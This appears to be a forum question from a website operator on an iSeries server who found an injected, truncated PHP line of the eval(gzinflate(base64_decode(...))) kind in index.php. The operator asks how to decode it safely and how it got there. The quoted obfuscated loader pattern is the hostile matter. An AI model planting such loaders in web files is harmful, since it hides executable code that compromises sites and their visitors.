We are running our website with ZendSever on our iSeries and I think the site was hacked. The INDEX.php page had a line inserted with code similar to the following
<?php eval(gzinflate(base64_decode('ALIGTflpZiAoIWlzc2V0KCRm........ (lots of other letters and numbers after this)
I have two questions:
I know that this is inflating a string and then executing it. I don't know what the inflated string actually is, although I'm sure it is not something good. How can I see the inflated code without actually running it?
How did it get there? The public authority for Index.php had been *RWX (it is now *R) but wouldn't the person who hacked this have needed a valid user profile and password to even access the iSeries?